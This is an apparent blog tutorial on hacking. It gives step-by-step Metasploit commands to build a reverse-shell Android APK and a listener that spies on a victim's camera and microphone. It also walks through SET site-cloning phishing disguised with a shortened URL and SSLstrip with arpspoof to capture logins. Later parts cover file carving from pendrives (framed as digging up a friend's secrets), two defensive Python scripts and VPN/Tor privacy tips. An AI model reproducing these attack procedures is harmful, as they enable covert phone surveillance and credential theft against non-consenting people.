Hacking an Android phone with Metasploit

Android devices have been a potential target from the day they were introduced to the market. They have proved to be good targets because they give out a lot of information about their owner. There are various ways to hack an Android phone, for example through an app, through the browser, etc.



What you need?
All you need is Kali Linux installed on VMware.

How to?
  1. Open the terminal, type the command ifconfig and note down the eth0 ip.
  2. Now type the command cd Desktop so that the apk file is created on the desktop of the virtual machine.
  3. Now type the command msfpayload android/meterpreter/reverse_tcp LHOST=ip LPORT=port R > hcak.apk. Here you have to paste your ip after LHOST= and a port number after LPORT=, and you can change hcak to any name you would prefer for the app.
  4. Now type msfconsole and hit enter, then type use exploit/multi/handler and hit enter.
  5. Now type set payload android/meterpreter/reverse_tcp and hit enter to set the payload for the handler.
  6. Now set the listener ip and port by typing set lhost ip and set lport port (make sure the ip and port are the same as the ones used in the msfpayload command). To check that the ip and port are set properly, type show options and hit enter.
  7. Now type exploit, hit enter and wait for the victim to install the apk and open it.
  8. Now type ifconfig or sysinfo to find out details about your target. You can try different commands to take snapshots, webcam snaps, voice recordings, etc.
Note:-
You only have access to the phone until the session ends; once the session ends you have to wait until the victim runs the app again.

SET: Phishing like a Pro

Phishing is a technique used by hackers to get a username and password by asking the victim to enter their credentials into a webpage which looks similar to the original site. This technique needs your social engineering skills together with a fair set of programming skills. And you also need to know a lit. Kali Linux provides a toolkit known as SET (Social Engineering Toolkit) which makes this complex process a lot easier and a lot more systematic.


But but but this trick only succeeds against a careless user.

What you need?

All you need is Kali Linux installed on VMware.

How to
  1. Start the terminal, type ifconfig and note the eth0 ip, which is your Ethernet ip.
  2. Now type the command service metasploit start to start the Metasploit service.
  3. Now type the command setoolkit and hit enter to start the SET toolkit. Then type 1 and hit enter.
  4. Now select option 2 from the list and hit enter.
  5. Now select option 3 from the list and hit enter.
  6. Now select option 2, which is the site cloner, from the list and hit enter.
  7. Now enter the eth0 ip which you noted at the beginning using ifconfig and hit enter, then enter the site URL (http://www.anysite.com) and hit enter.
  8. Now type the ip into any web browser to see the phishing site. Paste the ip into the Google URL shortener to turn it into a better-looking URL. Send this to the victim by whatever method and wait. After the user enters the username and password, check the file named like harvester_date.txt in the folder /var/www/.

Note:-
This trick will only work if the user is careless enough to enter his/her credentials on the fake page. Another problem is that if you look at the URL you can tell the difference between the original and the fake one. In other words, it depends on how careless the user is.

SSL Strip

What is SSL Strip?
SSL strip is a type of man-in-the-middle attack in which an HTTPS request is downgraded to an HTTP request before being sent on to the website through the router, so the browser ends up talking to the website over a plain HTTP connection.
HTTPS is more secure than HTTP (according to security professionals) but according to hackers "EVERYTHING is Shit".


What you need?
  1. Kali Linux installed on VMware
  2. Android phone with Fing - Network Tools (optional)
How to?
  1. Start your virtual machine.
  2. Open the terminal and type ifconfig. It will give you the list of interfaces. Note the wireless LAN interface (wlan*).
  3. Now type the command echo 1 > /proc/sys/net/ipv4/ip_forward, and then iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080 to forward the traffic.
  4. Then type the commands route -n (for the gateway ip) and nmap -sS -O gateway_ip (for the target ip), or simply open Fing - Network Tools to find the router and target ips.
  5. Now start the ARP spoofing by typing the command arpspoof -i wlan0 -t 192.168.1.123 -r 192.168.1.1. Here wlan0 can be replaced by your wireless LAN interface (wlan0, wlan1, wlan2, etc.); the ip after -t is your target ip and the ip after -r is the router ip.
  6. Keep the arpspoof terminal running, open a new terminal window and type sslstrip -l 8080.
  7. Now wait; once the target logs into a site you will see some details in the sslstrip window. Open a new terminal window and type cat sslstrip.log; this shows the log file, in which you can look for an email id and password.
Note:-
This will not work on Facebook as the traffic is encrypted thus you won't get the username and password.
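The arpspoof step above works by changing what the target's ARP cache says about the router. As an added example that is not part of the original post, the Python below detects that condition from an ARP table; the /proc/net/arp snapshot and the KNOWN_GATEWAY value are constructed assumptions, and on a real Linux host you would read the actual /proc/net/arp instead.

```python
"""Detect the arpspoof pattern from the steps above: once the victim's cache is
poisoned, the gateway IP and the attacker's own IP resolve to the same MAC.
Added example, not part of the original post; the ARP table is constructed."""
from collections import defaultdict

# Constructed /proc/net/arp snapshot from the victim. The gateway (192.168.1.1)
# and 192.168.1.50 (the attacker in this scenario) share one MAC, which is what
# arpspoof -r <router> leaves in the victim's cache. Read the real file on Linux.
ARP_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:dd:ee:50     *        wlan0
192.168.1.50     0x1         0x2         aa:bb:cc:dd:ee:50     *        wlan0
192.168.1.20     0x1         0x2         00:11:22:33:44:55     *        wlan0
"""

# Gateway MAC recorded earlier on a known-clean network (constructed value;
# in practice capture it once with `ip neigh` or `arp -n` and keep it).
KNOWN_GATEWAY = ("192.168.1.1", "00:11:22:33:44:01")

def parse_arp_table(text):
    """Return {ip: mac} from /proc/net/arp text, skipping the header row."""
    entries = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 4 and fields[3] != "00:00:00:00:00:00":
            entries[fields[0]] = fields[3].lower()
    return entries

def find_spoofing(entries, known_gateway):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    gw_ip, gw_mac = known_gateway
    # Signature 1: the gateway's MAC no longer matches the recorded one.
    if gw_ip in entries and entries[gw_ip] != gw_mac.lower():
        findings.append(f"gateway {gw_ip} MAC changed to {entries[gw_ip]}")
    # Signature 2: one MAC answers for several IPs (someone impersonating the gateway).
    by_mac = defaultdict(list)
    for ip, mac in entries.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} claims {sorted(ips)}")
    return findings

if __name__ == "__main__":
    for finding in find_spoofing(parse_arp_table(ARP_TABLE), KNOWN_GATEWAY):
        print("ALERT:", finding)
```

Run it periodically on the machines you care about; either signature firing while the gateway is up is the classic symptom of the arpspoof step described above.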
  

Recover & Retrieve: Find out your friend's secrets

Whenever we get a pendrive, even if the drive is empty it still holds a lot of information about what was stored on it. This can help you find out what he/she had saved on that drive, or recover sensitive information about your company which an employee had leaked. Recovery can be done for various reasons but the tricks remain the same.


What you need?
All you need is Kali Linux on VMware.

How to? 

Level-1:- Recuva
Recuva is a basic file recovery program which can be used to recover files deleted on a regular Windows computer. It is also portable: to make a portable version you only need to copy its files from the Program Files directory to your pendrive. It can recover files of a specific format such as images, videos, music, etc. It is useful for quickly recovering a file which you might have accidentally deleted.
  

We need to run one basic command first, fdisk -l, which lists the names of all the devices; this is the device name the recovery tools need when recovering files from a USB stick mounted on your Linux system.

You can consider this the first step towards file recovery in Kali Linux.

Level-2:- foremost
foremost is a quick recovery tool available in Kali Linux. It can be used in audits where you need to recover deleted files quickly. You can use various parameters according to the requirements of the audit; to see all of them, run the command foremost -h. If you want to recover all files and save them to a directory, use the command foremost -t all -v -i device_name -o directory. Here -t is the parameter which decides the type of file, -i is the parameter which gives the device or image name, and -o is the parameter which sets the output directory.

Level-3:- scalpel
scalpel is like a bazooka in the field of recovery. It is the ultimate recovery tool, able to recover all the files deleted from a drive or from an image of that drive. To use this tool you first need to make some changes to the .conf file present in /etc/scalpel: delete the # in front of each file type you want. The simplest thing to do is to delete the # in front of all the file formats. After this, save the file, open a terminal and type scalpel -h to find out about the different parameters you can use. To recover the files to a specific directory, type the command scalpel device_name_or_image_file_path -o output_directory.


Note:- When you use tools like scalpel and foremost you get an audit.txt file alongside the recovered files. This audit.txt file holds the log of all the files which were recovered by the tool.

Another great feature of these tools is that they save the different file extensions under different folders, which is systematic and helps you sort the files and locate the one you need.
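foremost and scalpel both work by header/footer carving, using the same kind of signatures you uncomment in the scalpel .conf file. The Python below is an added example, not code from the original post or from either tool: it carves JPEG and PNG files out of a constructed disk image, lays them out one folder per extension and produces an audit.txt like theirs. The SIGNATURES table and the FAKE_JPEG/FAKE_PNG bytes are assumptions made for the example.

```python
"""Minimal header/footer file carver in the style of foremost and scalpel.
Added example, not part of the original post or of either tool; the disk
image at the bottom is constructed so that it runs offline."""
import os

# Header, footer and size cap per type, the same idea as the scalpel.conf lines
# the tutorial has you uncomment. Carving stops at the footer or at max_size.
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9", 5 * 1024 * 1024),
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82", 5 * 1024 * 1024),
}

def carve(image):
    """Return a list of (ext, offset, data) for every file found in image."""
    found = []
    for ext, (header, footer, max_size) in SIGNATURES.items():
        pos = image.find(header)
        while pos != -1:
            end = image.find(footer, pos + len(header), pos + max_size)
            if end == -1:  # no footer within the cap: keep max_size bytes
                data = image[pos:pos + max_size]
            else:
                data = image[pos:end + len(footer)]
            found.append((ext, pos, data))
            pos = image.find(header, pos + len(data))
    return sorted(found, key=lambda f: f[1])

def audit_lines(found):
    """Build the audit.txt content: one line per carved file."""
    lines = ["File\tOffset\tSize"]
    for n, (ext, offset, data) in enumerate(found):
        lines.append(f"{ext}/{n:08d}.{ext}\t{offset}\t{len(data)}")
    return lines

def write_output(found, out_dir):
    """Save each file under out_dir/<ext>/ (one folder per type) plus audit.txt."""
    for n, (ext, _offset, data) in enumerate(found):
        os.makedirs(os.path.join(out_dir, ext), exist_ok=True)
        with open(os.path.join(out_dir, ext, f"{n:08d}.{ext}"), "wb") as fh:
            fh.write(data)
    with open(os.path.join(out_dir, "audit.txt"), "w") as fh:
        fh.write("\n".join(audit_lines(found)) + "\n")

# Constructed "disk image": zero padding, a tiny JPEG, junk, a tiny PNG, padding.
FAKE_JPEG = b"\xff\xd8\xff\xe0" + b"JFIF-payload" + b"\xff\xd9"
FAKE_PNG = b"\x89PNG\r\n\x1a\n" + b"chunks..." + b"IEND\xaeB`\x82"
DISK_IMAGE = b"\x00" * 16 + FAKE_JPEG + b"junk" * 8 + FAKE_PNG + b"\xff" * 16
```

carve(DISK_IMAGE) returns the JPEG at offset 16 and the PNG at offset 66, and write_output(carve(DISK_IMAGE), "recovered") lays them out under recovered/jpg/ and recovered/png/ with an audit.txt, the same layout foremost and scalpel give you.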

Ghost on the web: The science of private browsing

Whenever you go on the net there are various organizations that track your activity, and that data is then used for various purposes, mainly advertising and censorship. Some countries block certain content for their citizens. Some of these organizations also try to trace you back to your house. If you are trying to view content blocked in your country and the government traces your IP, the next second you will find the government at your doorstep.
There are various methods to access the net anonymously.

Private windows:-
Nowadays all browsers have a private window feature (incognito in Chrome). This can be considered the first line of defense against cyber espionage, but it is not very effective because your IP remains the same, so the method is easily bypassed. This kind of browsing only protects you from individuals who have physical access to your computer. In other words, mom won't know about the site you accessed.

Proxy sites:-
A proxy site is a special site which allows you to access blocked content. These sites act as a proxy server which relays all your traffic through the server to give you access to the blocked content. The problems with these sites are that they are hellishly slow and that your IP is still exposed, so the chance of getting traced is always there. In other words, you can watch YouTube videos on your college network. There are millions of such sites, like Kproxy, boomproxy, etc.


VPN:-
VPN is the acronym for virtual private network. A virtual private network is a virtual network to which a computer connects as it would to a regular network, and in the process the public IP of the computer changes. To understand this we tried various Android apps like Psiphon, TunnelBear, etc. To check the public IP we used Landroid. The difference observed was that the public IP and ISP of my phone changed. In other words, you can teleport to any country.
 
It should be understood that I didn't travel to Russia to connect to their network and take this screenshot. For security purposes I had to hide my IP.
This IP did change to US, Italian and many other countries' IPs.


We tried 2 services which were available for both Windows and Android: Psiphon and TunnelBear. TunnelBear was a free-to-try VPN and Psiphon was a completely free VPN. The main advantage of TunnelBear was that we could select the server manually, which offered a little control. But Psiphon was more practical as far as use was concerned. There are hundreds of other VPNs available on the net.

The main drawback is that if the government wants to trace you it is easy, as these servers have your IP. Also, all VPNs require a stable internet connection; if the connection keeps dropping, this software can slow down the device and sometimes drain your battery.



TOR:-
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. It relays the traffic across various nodes. This channel is only kept open for 10 minutes, after which the nodes change. The software was initially developed for the US armed forces so that they could connect to their home bases without any leaks, and thus it is simple to install and use. Tor is available for Android, Windows, Linux and various other operating systems.

You can host sites (onion sites) and access sites on the dark web (hidden web) through it. This software does take a little more time to connect but is highly secure. Its drawback is that the initial and final connections aren't encrypted, and it requires a special browser to work, which is mostly a modified Firefox. There are ways to crack this as well, but the skill set required is high. In other words, you can be a ghost on the web.
 
Conclusion:-
Thus, by using various techniques depending on the level of security you need, you can be a ghost on the web and browse the net privately.